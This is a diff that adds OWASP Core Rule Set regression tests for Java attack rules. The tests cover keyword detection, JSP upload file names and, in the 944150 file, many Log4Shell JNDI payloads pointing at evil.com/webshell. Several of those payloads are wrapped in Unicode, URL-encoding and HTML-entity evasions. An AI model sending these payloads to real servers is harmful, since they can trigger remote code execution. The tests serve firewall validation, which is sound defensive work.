+ - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: javax.script.ScriptEngineManager + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-391 + desc: "XML attribute value includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-392 + desc: "XML element value includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_title: 944130-393 + desc: "Nested XML element value includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_title: 944130-394 + desc: "Content-Type text/plain includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_title: 944130-395 + desc: "Content-Type application/json arg value includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"javax.script.ScriptEngineManager\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-396 + desc: "Content-Type application/json arg name includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"javax.script.ScriptEngineManager\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-397 + desc: "Argument test includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_title: 944130-398 + desc: "Argument name includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "org.apache.commons=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-399 + desc: "Cookie test includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=org.apache.commons + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-400 + desc: "Cookie name includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: org.apache.commons=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-401 + desc: "Request header test includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: org.apache.commons + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-402 + desc: "XML attribute value includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-403 + desc: "XML element value includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_title: 944130-404 + desc: "Nested XML element value includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_title: 944130-405 + desc: "Content-Type text/plain includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_title: 944130-406 + desc: "Content-Type application/json arg value includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"org.apache.commons\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-407 + desc: "Content-Type application/json arg name includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"org.apache.commons\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-408 + desc: "Argument test includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_title: 944130-409 + desc: "Argument name includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "org.omg.CORBA=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-410 + desc: "Cookie test includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=org.omg.CORBA + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-411 + desc: "Cookie name includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: org.omg.CORBA=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-412 + desc: "Request header test includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: org.omg.CORBA + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-413 + desc: "XML attribute value includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-414 + desc: "XML element value includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_title: 944130-415 + desc: "Nested XML element value includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_title: 944130-416 + desc: "Content-Type text/plain includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_title: 944130-417 + desc: "Content-Type application/json arg value includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"org.omg.CORBA\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-418 + desc: "Content-Type application/json arg name includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"org.omg.CORBA\": \"test\"}" + output: + log_contains: "id \"944130\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml new file mode 100644 index 0000000000..94fa1197e6 --- /dev/null +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml @@ -0,0 +1,141 @@ +--- +meta: + author: lifeforms + description: None + enabled: true + name: 944140.yaml +tests: + - test_title: 944140-1 + desc: Java script uploads + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + output: + no_log_contains: id "944140" + - test_title: 944140-2 + desc: Java script uploads + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jsp + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload1 + output: + log_contains: id "944140" + - test_title: 944140-3 + desc: Java script uploads + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X_Filename: B.jsp + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload2 + output: + log_contains: id "944140" + - test_title: 944140-4 + desc: Java script uploads + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: a.jspx + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload3 + output: + log_contains: id "944140" + - test_title: 944140-5 + desc: Java script uploads + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jsp.. + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload4 + output: + log_contains: id "944140" + - test_title: 944140-6 + desc: Java script uploads + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jspx.. + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + output: + log_contains: id "944140" + - test_title: 944140-7 + desc: Java script uploads + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: foo.jspx... + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + output: + log_contains: id "944140" + - test_title: 944140-8 + desc: Java script uploads + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X_Filename: foo.jspx. + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload7 + output: + log_contains: id "944140" + - test_title: 944140-9 + desc: Java script uploads + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: foo.html + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload8 + output: + no_log_contains: id "944140" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml new file mode 100644 index 0000000000..d40081dae8 --- /dev/null +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml @@ -0,0 +1,414 @@ +--- +# NOTE: Please keep these tests in sync with 944151.yaml. +# 944151 should detect the same things as 944150. +meta: + author: "dune73, Max Leske" + enabled: true + name: "944150.yaml" + description: "Description" +tests: + - test_title: 944150-1 + desc: Log4J exploit on arg foo + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=${jndi:ldap://evil.com/webshell} + output: + log_contains: id "944150" + - test_title: 944150-2 + desc: Log4J exploit on User-Agent + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests ${jndi:ldap://evil.com/webshell} + method: GET + port: 80 + uri: / + output: + log_contains: id "944150" + - test_title: 944150-3 + desc: Log4J exploit in XML code + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/xml + method: POST + port: 80 + uri: / + data: + output: + log_contains: id "944150" + - test_title: 944150-4 + desc: Log4J exploit in XML code + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/xml + method: POST + port: 80 + uri: / + data: "${jndi:ldap://evil.com/webshell}" + output: + log_contains: id "944150" + - test_title: 944150-5 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + output: + log_contains: id "944150" + - test_title: 944150-6 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + output: + log_contains: id "944150" + - test_title: 944150-7 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + output: + log_contains: id "944150" + - test_title: 944150-8 + desc: Log4J exploit on arg foo, with Unicode escape encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + output: + log_contains: id "944150" + - test_title: 944150-9 + desc: Log4J exploit on JSON with URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944150" + - test_title: 944150-10 + desc: Log4J exploit on JSON with Unicode escape evasion, uppercase + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944150" + - test_title: 944150-11 + desc: Log4J exploit on JSON with Unicode escape evasion, lowercase + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944150" + - test_title: 944150-12 + desc: Log4J exploit on JSON with named HTML entity evasion, lower case + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944150" + - test_title: 944150-13 + desc: Log4J exploit on JSON with named HTML entity evasion, upper case + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944150" + - test_title: 944150-14 + desc: Log4J exploit on JSON with numeric HTML entity evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944150" + - test_title: 944150-15 + desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944150" + - test_title: 944150-16 + desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944150" + - test_title: 944150-17 + desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944150" + - test_title: 944150-18 + desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944150" + - test_title: 944150-19 + desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944150" + - test_title: 944150-20 + desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944150" + - test_title: 944150-21 + desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944150" + - test_title: 944150-22 + desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944150" + - test_title: 944150-23 + desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: / + output: + log_contains: id "944150" + - test_title: 944150-24 + desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944150" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml new file mode 100644 index 0000000000..20b0f6209e --- /dev/null +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml @@ -0,0 +1,431 @@ +--- +# NOTE: Please keep these tests in sync with 944151.yaml. +# 944151 should detect the same things 